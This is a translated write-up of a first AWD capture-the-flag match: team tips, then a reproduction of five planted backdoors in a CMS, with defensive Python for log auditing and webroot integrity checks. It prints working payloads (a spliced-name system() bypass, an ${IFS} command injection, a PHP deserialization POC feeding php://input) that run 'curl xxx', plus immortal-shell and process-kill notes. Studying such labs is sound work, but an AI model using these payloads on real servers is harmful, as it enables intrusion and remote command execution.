Preface:
Before the review I was too busy to write up my impressions of the competition or reproduce the challenges, so I am doing both now.
Part One: impressions from my first AWD competition
Since this was my first AWD match, my experience was lacking in every respect. In the days before the competition I frantically collected all kinds of scripts, frameworks and tools, and read the blogs of more experienced players to learn. Here is what I picked up along the way:
First, make a backup
I read a lot of blogs by experienced players. Some of them wrote that an AWD competition may give every team the same SSH account and password, so you could download one of the batch SSH-password-changing scripts on GitHub and make opponents lose points right at the start. After this competition, though, I found that this kind of human error does not actually happen any more; the organizers avoid such loopholes, otherwise the whole game would be pointless. So I think the batch SSH-password script will be useless in the next competition, at best a backup plan in case the organizers get lazy (which would be a bit cool)...
As for what to do at the start of the game: a team is usually three people, and to protect your flags and your own box within a short time, the team needs to agree on a clear division of labor in advance so that everyone works efficiently.
You also need finalshell. This tool connects to your box: just enter the box's IP and the SSH account and password and you can control it. Use it for the backup and for deploying a WAF.
At the start of the match the first step is the backup. It is best to use a visual tool such as the FileZilla FTP client, or you can use Linux's own tar and compression commands. The point of the backup is this: if an opponent gets into your box and deletes your WWW directory, having no backup is equivalent to downtime, and you just sit there losing points. So the backup is very important. Connect with the SSH account, password and host IP the organizers give you and back everything up.
Second, look for backdoors or vulnerabilities
Another benefit of the backup is that you can audit its source code. Everyone's WWW service directory is the same, so if you can be the first to find a vulnerability in the source, you can collect a wave of points. Here I use D盾 (D-Shield): this tool finds out whether there is a backdoor or other exploitable point, which also gives you a direction of attack. Another tool is Seay源代码审计工具 (the Seay source code audit tool), which can likewise point you toward attacks.
Third, prepare or write scripts
Scripts, scripts, scripts!!! This is very important. Taking part in a match, I found that scripting ability really matters. Finding the vulnerability is important, but if you cannot write a corresponding batch script, imagine it: so many teams, three people submitting by hand, the flag refreshing every five minutes; inefficient and exhausting. So by all means improve your scripting (mine is poor, but it will slowly improve). In AWD, scripting ability is what sets teams apart, provided you find the vulnerability first. If, like me, your scripting is still weak, don't panic: many experienced players have published scripts on GitHub, and as long as you understand them and can adapt them, you can use them. I won't list resources here; a Google or Baidu search turns up plenty. In a word: learn Python and learn to write your own scripts. It really matters!!!
Also keep a backup of common POCs. Most AWD games use some CMS, and those CMSes more or less all have known vulnerabilities, so sometimes a POC is a big help. They are on GitHub; not listed here.
Fourth, mindset
The basic process of a match is as above, but I think mindset matters too. Don't go in worrying about what rank you have to reach; keep a calm attitude and don't panic. If you get hit, go audit the logs, see how the better players attacked you and whether other teams are exploiting the same point; then you can use that point to score yourself. If your mindset collapses, the whole game stops being fun. Remember to adjust your attitude: don't worry so much about ranking in your first entries. Where you did well, keep working; where you failed, summarize where things went wrong, so you don't fall into the same pit several times in a row. That is how you make progress.
Part Two: reproduction
The CMS in this match was fairly new and had no published vulnerabilities, so the POCs were useless. The organizers did, however, leave the players a lot of backdoors. During the match we only managed to use one of them (we are that weak), but we still scored plenty of points. After the match all the vulnerabilities were kept for reproduction, so don't just do nothing once the game ends.
First, connect to your own box
Use the tool to connect to the box, find the WWW directory and back up the corresponding service. After a successful backup, run a D-Shield scan.
It found three suspicious spots; let's look at the first one.
The first backdoor: a one-line webshell
It is a one-line Trojan (一句话木马), so connect to it directly with AntSword (蚁剑). Once connected, you can use the curl command to get the flag you want. But such a simple backdoor is known to everyone, so it comes down to hand speed, and this is where the importance of scripting shows.
This script was written earlier by an experienced player; we only changed a few competition-specific details and still got a lot of flags, so scripts really are important!!! In fact, if you read the script, it is not hard to follow. What matters is the idea, and practicing more.
The second backdoor: a Behinder (冰蝎) one-liner
We really are weak: during the match we never found this Behinder one-liner, and only noticed it during reproduction, when I downloaded Behinder and saw the Behinder shell that comes with it...
Well, if you spot this first next time, keep going and add fuel; we simply knew too little!
The third backdoor: a common filter bypass
This piece of code filters many characters and commonly used high-risk functions such as system, etc.
Getting a malicious statement past the filter needs some thought; here the filter can be bypassed by splicing the function name together from strings:
payload:
?cmd=$a='syste';$b='m';$c=$a.$b;$c('curl xxx');
It really works. The more complex things get, the weaker I feel...
The fourth backdoor: command execution + variable override
This one is the most unfortunate. During the match we noticed a request for a ping_test.php file. Looking at the file, it really is command execution, but it filters out some things.
Observing that it includes a define.php file, we look at that file and find
very clearly that spaces are filtered. We could not reproduce it during the match no matter what, so I wanted to work through it myself.
There are ways to bypass the space filter: %09 and ${IFS}.
payload:
des=| curl${IFS}xxx
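As an added example (my own code, not a script or backdoor from the original post), here is a small Python log audit of the kind the mindset section recommends when you get hit: it URL-decodes each request in the access log and flags the bypass patterns used against the third and fourth backdoors (a function name spliced from strings, %09 and ${IFS} as space substitutes, pipes and curl call-outs). The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real competition data.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0800] "GET /shell.php?cmd=$a=%27syste%27;$b=%27m%27;$c=$a.$b;$c(%27curl%20xxx%27); HTTP/1.1" 200 88 "-" "python-requests/2.31"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0800] "GET /ping_test.php?des=|%20curl${IFS}xxx HTTP/1.1" 200 40 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0800] "GET /ping_test.php?des=127.0.0.1%09;%09id HTTP/1.1" 200 40 "-" "curl/7.88"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0800] "POST /upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request target and status of a combined-format line
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')

# Each rule runs against the URL-decoded request target.
RULES = {
    # $a='syste';$b='m';$c=$a.$b;$c(...)  (third backdoor: function name built by splicing)
    "spliced-funcname": re.compile(r"\$\w+\s*=\s*'[a-z]+'\s*;.*\$\w+\s*\(", re.I),
    "ifs-space-bypass": re.compile(r"\$\{IFS\}|\$IFS"),     # fourth backdoor: ${IFS} instead of a space
    "tab-space-bypass": re.compile(r"\t"),                  # %09 decodes to a tab character
    "shell-callout": re.compile(r"\b(curl|wget|bash)\b", re.I),
    "command-separator": re.compile(r"[|;]"),
}

def audit_line(line):
    """Parse one log line; return (ip, decoded_url, matched_rule_names) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("url"))
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    return m.group("ip"), decoded, hits

def audit_log(text):
    """Return the suspicious requests as dicts, most rule hits first (stable for ties)."""
    findings = []
    for line in text.splitlines():
        parsed = audit_line(line)
        if parsed and parsed[2]:
            ip, url, hits = parsed
            findings.append({"ip": ip, "url": url, "rules": hits})
    return sorted(findings, key=lambda f: -len(f["rules"]))

if __name__ == "__main__":
    for f in audit_log(SAMPLE_LOG):
        print(f["ip"], ",".join(f["rules"]), f["url"])
```

Run it over the real access log (for example /var/log/apache2/access.log on the box) and the requests that hit the most rules show you which backdoor the other teams are using.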
The fifth backdoor: information gathering + file inclusion + deserialization
While auditing the source I found a hint in admin.php.
That being the case, let's look at MySQL's history to see what has changed:
cat /root/.mysql_history
This file holds MySQL's operating history. Because I built this locally there is no information in it here, but during the match it should have pointed to \html\public\ueditor\php\controller.php. Then, looking at phpinfo, allow_url_include was On, so the php://input protocol can be used to get a shell directly.
Looking at the file, there is an obvious direct deserialize call.
Official POC:
    <?php
    class Control{
        public $file = '<?=phpinfo();?>';
        private $flag;
        public function __destruct(){
            // the only check is that $file does not contain "<?", so a stream wrapper passes
            if(isset($this->file) && !preg_match('/<\?/is', $this->file)){
                require($this->file);
            }
        }
    }
    $a = new Control();
    $a->file = 'php://input';   // require() then includes the raw POST body
    echo serialize($a);
Run it online, then send the request:
?action=shell&data=O:7:"Control":2:{s:4:"file";s:11:"php://input";s:13:"%00Control%00flag";N;}
with the POST body:
<?php system('curl xxx'); ?>
But I did not manage to reproduce this one.
Side story: uploading an immortal shell (不死马)
At the start, after connecting with AntSword, I thought of dropping an immortal shell, but it kept failing. The permission in the match was obviously root, so we didn't pay attention to that; from the write-up (WP) published later I learned that you only have permission to upload into the upload folder....
Oh, I can't finish this summary without venting about how weak I am.
Below are my notes on immortal shells, so I don't forget.
This is a common immortal shell; you set your own password and it is stored as an md5 hash. Here I set it to islemon.
If the immortal shell uploads successfully, trigger it first. After a successful trigger, take a look: the generated Trojan appears; connect to it.
Success!!!
If your own box has been planted with an immortal shell and you have permission, run service apache2 restart and then delete it directly.
If you do not have permission to restart, kill all child processes of the www-data user:
ps aux | grep www-data | awk '{print $2}' | xargs kill -9
It is indeed deleted successfully.
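Added example (my own code, not from the post): a Python webroot integrity check that ties the backup step from Part One to the immortal-shell cleanup above. Take a snapshot of the WWW directory right after backing it up, re-run it during the match, and it lists the files an attacker added or changed, flagging hidden .php files like the one the immortal shell rewrites and PHP dropped into the upload folder. The file names in the demo are constructed.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Map relative path -> sha256 hex digest for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest

def diff_manifests(baseline, live):
    """Compare two snapshots; return sorted lists of added, modified and deleted paths."""
    return {
        "added": sorted(p for p in live if p not in baseline),
        "modified": sorted(p for p in live if p in baseline and live[p] != baseline[p]),
        "deleted": sorted(p for p in baseline if p not in live),
    }

def suspicious(paths):
    """Flag paths that look like dropped shells: hidden .php files, or .php inside an upload dir."""
    flagged = []
    for p in paths:
        base = os.path.basename(p)
        if base.endswith(".php") and (base.startswith(".") or "upload" in p.lower()):
            flagged.append(p)
    return flagged

if __name__ == "__main__":
    # Constructed demo: build a tiny webroot, snapshot it, then simulate an attacker's changes.
    with tempfile.TemporaryDirectory() as www:
        os.makedirs(os.path.join(www, "upload"))
        with open(os.path.join(www, "index.php"), "w") as f:
            f.write("<?php echo 'hello'; ?>")
        baseline = snapshot(www)                                 # taken right after the backup
        with open(os.path.join(www, ".ski12.php"), "w") as f:    # hidden file an immortal shell rewrites
            f.write("<?php /* constructed placeholder */ ?>")
        with open(os.path.join(www, "index.php"), "a") as f:     # legitimate file tampered with
            f.write("\n<?php /* constructed placeholder */ ?>")
        report = diff_manifests(baseline, snapshot(www))
        print(report)
        print("suspicious:", suspicious(report["added"] + report["modified"]))
```

A file that reappears in "added" on every run even after you delete it is the tell-tale sign of an immortal shell still running, which is when the process-kill step above is needed.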
Third method: create a directory with the file name the immortal shell generates
Too weak, I did not reproduce this successfully; go and read other experienced players' posts for it!!
Fourth method: write a competing script using ignore_user_abort(true)
The script keeps deleting the file the immortal shell writes during the match. Its usleep() must be shorter than the immortal shell's usleep(), otherwise it has no effect.
    <?php
    ignore_user_abort(true);    // keep running after the client disconnects
    set_time_limit(0);          // no execution time limit
    $pid = 12345;               // PID of the immortal-shell process (placeholder, take it from ps aux)
    while (1) {
        @unlink(".ski12.php");  // delete the file the immortal shell keeps rewriting
        exec("kill -9 $pid");   // and kill the process that rewrites it
        usleep(1000);           // must be shorter than the immortal shell's usleep()
    }
    ?>
Summary:
I prefer the second method, killing the process, since it is relatively simple. If I run into other methods later I will write them up. I really am a weak player, so I must practice scripting. These little tricks are all from more experienced players; please don't flame me...